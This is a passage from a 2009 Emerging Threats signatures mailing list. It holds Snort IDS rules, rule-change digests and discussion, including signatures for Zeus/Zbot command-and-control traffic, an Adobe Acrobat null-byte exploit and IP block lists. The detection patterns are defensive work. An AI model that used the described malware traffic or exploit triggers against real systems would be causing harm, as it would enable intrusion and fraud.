        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (20):
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From jaime.blasco at alienvault.com  Mon May  4 10:55:49 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Mon, 4 May 2009 16:55:49 +0200
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
Message-ID: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>

Hi!

I've been analyzing some spam traffic, related to snort's rule:
policy.rules:alert tcp $SMTP_SERVERS 25 -> $EXTERNAL_NET any (msg:"POLICY
SMTP relaying denied"; flow:established,from_server; content:"550 5.7.1";
depth:70; reference:arachnids,249; reference:url,
mail-abuse.org/tsi/ar-fix.html; classtype:misc-activity; sid:567; rev:11;)

we could write a rule to detect smtp responses like this:
553 Mail from *.*.* not allowed - 5.7.1 [BL23] Connections not accepted from
IP addresses on Spamhaus XBL; see http://postmaster.yahoo.com/550-bl23.html[550]

alert tcp $EXTERNAL_NET 25 -> $HOME_NET any (msg:"ET POLICY IP address
BlackListed (Spamhaus)"; flow:established,from_server; content:"553 Mail
from"; content:"Spamhaus XBL"; classtype:misc-activity; sid:; rev:1;)

Regards

-- 
_______________________________

Jaime Blasco

www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090504/6462d415/attachment.html

From daniel.clemens at packetninjas.net  Mon May  4 12:37:53 2009
From: daniel.clemens at packetninjas.net (Daniel Clemens)
Date: Mon, 4 May 2009 11:37:53 -0500
Subject: [Emerging-Sigs] EXPLOIT Adobe Acrobat Reader Malicious URL Null
	Byte - FP
Message-ID: <7F88BA38-13EF-4DFC-93B7-D5691CEFF367@packetninjas.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "ET EXPLOIT  
Adobe Acrobat Reader Malicious URL Null Byte"; flow:  
to_server,established; uricontent:".pdf|00|"; nocase;  
reference:url,idefense.com/application/poi/display? 
id=126&type=vulnerabilities; reference:url,www.securiteam.com/windowsntfocus/5BP0D20DPW.html 
; reference:cve,2004-0629; classtype:attempted-admin;  
reference:url,doc.emergingthreats.net/bin/view/Main/2001217;  
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Adobe_Acrobat_BO 
; sid:2001217; rev:9;)

This rule only triggers on a uri request ending in .pdf followed by a  
null byte.
This rule should trigger on overly long strings after the %00 byte  
within the request which would trigger the overflow in the activeX  
control.
The way this rule is currently written opens itself up to a few false  
positives...

| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850      | | o. 866.267.8851
"The secret to creativity is knowing how to hide your sources" Einstein

-----BEGIN PGP SIGNATURE-----

iD8DBQFJ/xnhlZy1vkUrR4MRAj+MAJ0cRo4eBBW+7B79qv9lz8OPTy7tMACfWMFE
CRXLQO+ByqiP2WyfmpBhxhQ=
=BJTE
-----END PGP SIGNATURE-----

From emerging at emergingthreats.net  Mon May  4 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon,  4 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090504200011.CF7D94501B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Mon May  4 16:00:11 2009 [***]

[+++]          Added rules:          [+++]

 2009300 - ET TROJAN Small.zon checkin (emerging-virus.rules)


[///]     Modified active rules:     [///]

 2009288 - ET WEB PHP Attack Tool Revolt Scanner (emerging-web.rules)
 2009296 - ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin (emerging-virus.rules)
 2009297 - ET TROJAN Boaxxe HTTP POST Checkin (emerging-virus.rules)
 2009298 - ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan (emerging-scan.rules)
 2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (6):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecurityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Banbra || url,doc.emergingthreats.net/2009296
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Boaxxe || url,doc.emergingthreats.net/2009297
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Xprobe2 || url,doc.emergingthreats.net/2009298 || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009299
        2009300 || ET TROJAN Small.zon checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Small.zon || url,doc.emergingthreats.net/2009300

     -> Added to emerging-sid-msg.map.txt (6):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecurityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Banbra || url,doc.emergingthreats.net/2009296
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Boaxxe || url,doc.emergingthreats.net/2009297
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Xprobe2 || url,doc.emergingthreats.net/2009298 || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009299
        2009300 || ET TROJAN Small.zon checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Small.zon || url,doc.emergingthreats.net/2009300

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (5):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecureityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader

     -> Removed from emerging-sid-msg.map.txt (5):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecureityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader


From cunningpike at gmail.com  Mon May  4 18:58:38 2009
From: cunningpike at gmail.com (CunningPike)
Date: Mon, 04 May 2009 15:58:38 -0700
Subject: [Emerging-Sigs] [Fwd: 180/8 and 183/8 allocated to APNIC]
Message-ID: <1241477918.17573.6.camel@arodgers-panasonic>

-------- Forwarded Message --------
> From: Leo Vegoda <leo.vegoda at icann.org>
> To: Leo Vegoda <leo.vegoda at icann.org>
> Subject: 180/8 and 183/8 allocated to APNIC
> Date: Thu, 30 Apr 2009 15:03:57 -0700
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hi,
> 
> The IANA IPv4 registry has been updated to reflect the allocation
> of two /8 IPv4 blocks to APNIC in April 2009: 180/8 and 183/8. You can
> find the IANA IPv4 registry at:
> 
> http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml
> http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml
> http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt
> 
> Please update your filters as appropriate.
> 
> Regards,
> 
> Leo Vegoda
> Number Resources Manager, IANA
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 9.10.0.500
> 
> wj8DBQFJ+iBAvBLymJnAzRwRAq59AKDYIE9QGQAAJQDuqfQ5Qqo5YiZwWwCg1RNg
> wwnJkpL3STZw9fDOM7zUToM=
> =PtJl
> -----END PGP SIGNATURE-----
> 
> 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090504/97f5968d/attachment.bin

From jonkman at jonkmans.com  Mon May  4 22:20:57 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 04 May 2009 22:20:57 -0400
Subject: [Emerging-Sigs] Positions Available
Message-ID: <49FFA289.3010802@jonkmans.com>

I'm happy to announce that we're ready to start hiring and coding for
the new OISF IPS Engine!!

Funding is coming around and work is set to begin. We have a great deal
to do, so we're soliciting a number of positions. Some are full time,
some part time, and some project/task based. How each fits is partly up
to the the person we find with the prerequisite skills, and what fits
into their schedule.

Please contact us at team at openinfosecfoundation.org if you or someone
you know might fit into the following positions and has some
availability this year:

Coders:
Some IPS and/or network coding experience preferred, but we welcome
cross-discipline (i.e. high speed computing, multi-threading, etc)
experience as well. There will be a number of positions from full time
through the entire project (1-2 years) to part time and task based work.
If you're interested please contact us! (If you've already committed to
work please shoot me a line and let me know how your near-term schedule
looks)

Project Manager:
We need the consulting services of a professional project manager. This
will preferably be a part time consulting role to assist in plan design
and high level oversight.

More positions will be coming around very soon so please stay tuned!

The Open Information Security Foundation Team!
http://www.openinfosecfoundation.org




-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Mon May  4 22:23:30 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 04 May 2009 22:23:30 -0400
Subject: [Emerging-Sigs] [Fwd: 180/8 and 183/8 allocated to APNIC]
In-Reply-To: <1241477918.17573.6.camel@arodgers-panasonic>
References: <1241477918.17573.6.camel@arodgers-panasonic>
Message-ID: <49FFA322.8030804@jonkmans.com>

Got it, thanks Pike!

Matt

CunningPike wrote:
> -------- Forwarded Message --------
>> From: Leo Vegoda <leo.vegoda at icann.org>
>> To: Leo Vegoda <leo.vegoda at icann.org>
>> Subject: 180/8 and 183/8 allocated to APNIC
>> Date: Thu, 30 Apr 2009 15:03:57 -0700
>>
> Hi,
> 
> The IANA IPv4 registry has been updated to reflect the allocation
> of two /8 IPv4 blocks to APNIC in April 2009: 180/8 and 183/8. You can
> find the IANA IPv4 registry at:
> 
> http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml
> http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml
> http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt
> 
> Please update your filters as appropriate.
> 
> Regards,
> 
> Leo Vegoda
> Number Resources Manager, IANA
> 
>>
>>
>>
------------------------------------------------------------------------
>>
_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From daniel.clemens at packetninjas.net  Tue May  5 01:24:40 2009
From: daniel.clemens at packetninjas.net (Daniel Clemens)
Date: Tue, 5 May 2009 00:24:40 -0500
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
Message-ID: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>



alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS
(msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST";
flow:established,to_server;content:"POST";depth:5;
content:"|e5 c6 80 37 55 67 da  
e5|";flowbits:noalert;flowbits:set,Zlob.POST;
reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1;)


alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
(msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response";
flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67 da  
e5 1a 21 71 4c|";
content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|";content:"| 
b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|";
flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx 
; rev:1;)

Similarities in initial POSTS:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Similarities-Signature.png
Type: image/png
Size: 57963 bytes
Desc: not available
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/9518b96b/Similarities-Signature-0001.png
-------------- next part --------------



Responses:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: response-diffs.tiff
Type: image/tiff
Size: 42522 bytes
Desc: not available
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/9518b96b/response-diffs-0001.tiff
-------------- next part --------------




Other links which include information about Zbot,Zues,WsPoem:
http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html

Older Historical Quotes for context:
Botnet-controlled Trojan robbing online bank customers
Security firm says malware targeting commercial customers believed to
have come from Russia
By Ellen Messmer, Network World, 12/13/07

"It's been very successful since we've first seen this at the end of
November," says Don Jackson, senior security researcher at SecureWorks,
which believes the Prg Trojan variant is designed by the Russian hackers
group known as Russian UpLevel working with some German affiliates.

| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850      | | o. 866.267.8851
"The secret to creativity is knowing how to hide your sources" Einstein

-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 155 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/9518b96b/PGP-0001.bin

From thierry.chich at ac-clermont.fr  Tue May  5 04:29:59 2009
From: thierry.chich at ac-clermont.fr (Thierry CHICH)
Date: Tue, 5 May 2009 10:29:59 +0200
Subject: [Emerging-Sigs] Rar detection coming from china
Message-ID: <200905051029.59792.thierry.chich@ac-clermont.fr>


Yesterday, on the net I manage, all the bad rar downloaded by trojans are 
coming from this unique address 221.1.204.243. 
Is it something to think about that ? Is "China netcom" considered in the same 
way some russian providers are ? 


-- 
Thierry CHICH
Equipe R?seaux / Rectorat de Clermont-Ferrand
Tel: +33 4 73 99 30 54
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/6f4705c5/attachment.html

From dxp2532 at gmail.com  Tue May  5 10:07:08 2009
From: dxp2532 at gmail.com (dxp)
Date: Tue, 05 May 2009 10:07:08 -0400
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
References: <D3FE430B-D025-4342-9820-D5CF8A8B1E66@packetninjas.net>
Message-ID: <1241532428.6818.7.camel@kinta>

Daniel,

I think these signatures will have many False Negatives due to the fact
that they will be detecting only the trojan which you've obtained
traffic captures from.  Zeus versions 1.2.x.x use RC4 encryption in all
C&C communication thus data will only match for those which use the same
key.

The reason why there are similar bytes in three of the captures is due
to same header in all those POSTs which are encrypted with the same key.
Once the key is changed, which is unique per botnet and can easily
change at the will of the botmaster, the signatures won't prodive
detection.

Basically, from the perspective of IDS it only sees random bytes in the
POST.  The only thing which is static is the minimum amount of bytes
which must be present for a valid record.  However, within those bytes
there's nothing unique.
-  

-=[ dxp ]=-
0xA3F3C6E3



On Tue, 2009-05-05 at 00:24 -0500, Daniel Clemens wrote:

> 
> alert tcp any any -> $EXTERNAL_NET $HTTP_PORTS
> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x POST";
> flow:established,to_server;content:"POST";depth:5;
> content:"|e5 c6 80 37 55 67 da  
> e5|";flowbits:noalert;flowbits:set,Zlob.POST;
> reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx;rev:1;)
> 
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
> (msg:"ETC Zbot/Zues/WsPoem > v1.2.x.x Server Response";
> flow:established,to_client;content:"|29 69 7f 1f e5 c6 80 37 5f 67 da  
> e5 1a 21 71 4c|";
> content:"|d8 ee 78 25 99 7f 6f 62 09 fe 1f 6c 91 cc 52 7b|";content:"| 
> b0 d2 ef 20 9e 7a 34 80 14 f3 cc 3d 51 7b|";
> flowbits:isset,Zlob.POST;reference:url,www.packetninjas.net/?p=586;classtype:trojan-activity;sid:xxx 
> ; rev:1;)
> 
> Similarities in initial POSTS:
> 
> 
> Responses:
> 
> 
> 
> Other links which include information about Zbot,Zues,WsPoem:
> http://dxp2532.blogspot.com/2009/04/zeus-zbot-prg-ntos-wsnpoem.html
> http://blogs.technet.com/mmpc/archive/2008/10/10/malware-writer-wants-an-eye-to-eye-with-us.aspx
> http://blog.s21sec.com/2009/04/when-bot-master-goes-mad-kill-os.html
> http://www.malwaredomainlist.com/forums/index.php?topic=2514.msg7621#msg7621
> http://sunbeltblog.blogspot.com/2009/01/sriurz-sez-hello-from-russia.html
> http://www.threatexpert.com/blog/zbot/DecodeZeusConfig.zip
> http://garwarner.blogspot.com/2008/11/enlisting-your-bank-to-steal-your.html
> 
> Older Historical Quotes for context:
> Botnet-controlled Trojan robbing online bank customers
> Security firm says malware targeting commercial customers believed to
> have come from Russia
> By Ellen Messmer, Network World, 12/13/07
> 
> "It's been very successful since we've first seen this at the end of
> November," says Don Jackson, senior security researcher at SecureWorks,
> which believes the Prg Trojan variant is designed by the Russian hackers
> group known as Russian UpLevel working with some German affiliates.
> 
> | Daniel Uriah Clemens
> | Packetninjas L.L.C | | http://www.packetninjas.net
> | c. 205.567.6850      | | o. 866.267.8851
> "The secret to creativity is knowing how to hide your sources" Einstein
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/25aa136f/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/25aa136f/attachment.bin

From scheidell at secnap.net  Tue May  5 12:36:52 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Tue, 05 May 2009 12:36:52 -0400
Subject: [Emerging-Sigs] RBN blocks blocking indian registrar mitsu.in
Message-ID: <4A006B24.2080005@secnap.net>

looks like your RBN blocks lists are blocking the .in registrar.

not a good idea.


grep  67.15.47.4 /var/log/snort.log
May  5 12:23:19 scanner snort[14078]: [1:2407153:127] ET RBN Known 
Russian Business Network Monitored Domains - BLOCKING (154) 
[Classification: Misc Attack] [Priority: 2]: <trust0> {TCP} 67.15.47.4:80

host www.mitsu.in
www.mitsu.in is an alias for indiandomains.supersite.myorderbox.com.
indiandomains.supersite.myorderbox.com has address 67.15.184.7


also, 67.15.47.7  67.15.47.3.. (their dns servers)




-- 
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 > *| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best Anti-Spam Product 2008, Network Products Guide
    * King of Spam Filters, SC Magazine 2008


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
_________________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/ece39cc6/attachment.html

From scheidell at secnap.net  Tue May  5 12:44:40 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Tue, 05 May 2009 12:44:40 -0400
Subject: [Emerging-Sigs] RBN blocks blocking indian registrar mitsu.in
In-Reply-To: <4A006B24.2080005@secnap.net>
References: <4A006B24.2080005@secnap.net>
Message-ID: <4A006CF8.2090809@secnap.net>

this one also:

grep 67.15.184 /var/log/snort.log
May  5 12:18:03 scanner snort[14078]: [1:2407152:127] ET RBN Known 
Russian Business Network Monitored Domains - BLOCKING (153) 
[Classification: Misc Attack] [Priority: 2]: <trust0> {TCP} 
67.15.184.7:80 -> 10.70.3.3:50548


Michael Scheidell wrote:
> looks like your RBN blocks lists are blocking the .in registrar.
>
> not a good idea.
>
>
> grep  67.15.47.4 /var/log/snort.log
> May  5 12:23:19 scanner snort[14078]: [1:2407153:127] ET RBN Known 
> Russian Business Network Monitored Domains - BLOCKING (154) 
> [Classification: Misc Attack] [Priority: 2]: <trust0> {TCP} 67.15.47.4:80
>
> host www.mitsu.in
> www.mitsu.in is an alias for indiandomains.supersite.myorderbox.com.
> indiandomains.supersite.myorderbox.com has address 67.15.184.7
>
>
> also, 67.15.47.7  67.15.47.3.. (their dns servers)
>
>
>
>
> -- 
> Michael Scheidell, CTO
> Phone: 561-999-5000, x 1259
> > *| *SECNAP Network Security Corporation
>
>     * Certified SNORT Integrator
>     * 2008-9 Hot Company Award Winner, World Executive Alliance
>     * Five-Star Partner Program 2009, VARBusiness
>     * Best Anti-Spam Product 2008, Network Products Guide
>     * King of Spam Filters, SC Magazine 2008
>

-- 
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 > *| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best Anti-Spam Product 2008, Network Products Guide
    * King of Spam Filters, SC Magazine 2008


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
_________________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090505/19c2bafd/attachment.html

From nate+emerging at richmond-family.org  Tue May  5 13:28:08 2009
From: nate+emerging at richmond-family.org (Nathaniel Richmond)
Date: Tue, 5 May 2009 13:28:08 -0400 (EDT)
Subject: [Emerging-Sigs] ET MALWARE Suspicious User Agent (Microsoft
	Internet Explorer)
Message-ID: <20090505172808.51FD1A402B@medusa.richmond-family.org>

SID 2002400 will trigger on GETs to "Host: vmware.com" or "Host:
live.com" because of the preceding dot in the negation for
vmware.com and live.com. I'm getting some non-malicious hits on this
signature. I believe vmware may use this as a user-agent when
checking for updates from a Windows host.

Removing the leading dot would allow something like fakevmware.com,
but an alternative is to modify by adding 'content:!"Host|3A|
vmware.com"', for example.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
MALWARE Suspicious User Agent (Microsoft Internet Explorer)"; flow:
to_server,established; content:"User-Agent\: Microsoft Internet
Explorer"; content:!"bbc.co.uk"; nocase; content:!"microsoft.com";
nocase; content:!".vmware.com"; nocase; content:!"msn.com"; nocase;
content:!".live.com"; nocase; threshold:type limit, track by_src,
count 2, seconds 360; reference:url,www.topinstalls.com;
